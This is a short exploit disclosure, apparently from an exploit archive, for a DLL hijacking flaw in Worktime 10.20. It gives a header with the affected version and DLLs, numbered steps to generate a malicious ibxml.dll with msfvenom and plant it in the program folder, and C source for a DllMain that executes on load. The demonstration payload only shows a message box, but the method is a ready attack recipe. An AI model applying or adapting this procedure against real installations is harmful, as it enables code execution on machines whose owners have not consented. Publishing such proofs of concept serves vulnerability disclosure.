/* 
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Exploit Title: Worktime 10.20 Build 4967 DLL Hijacking Exploit 
Date: 15/01/2022
Author: Yehia Elghaly 
Vendor: https://www.worktime.com/
Software: https://www.worktime.com/download/worktime_corporate.exe
Version: Latest Worktime 10.20 Build 4967
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
Vulnerable DLL: (ibxml.dll - WINSTA.dll)
*/


Instructions:

1. Create dll using msfvenom (sudo msfvenom  --platform windows -p windows/messagebox TEXT="Work Time Hacked - YME" -f dll > ibxml.dll) or compile the code
2. Replace ibxml.dll  in Worktime directory C:\Program Files\WorkTimeAdministrator or C:\WorkTime with your newly dll
3. Launch WorkTimeServer.exe or WorkTimeAdministrator.exe
4. PoP UP  MessageBox!



#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "WorkTime Hacked!", "YME", MB_OK);
}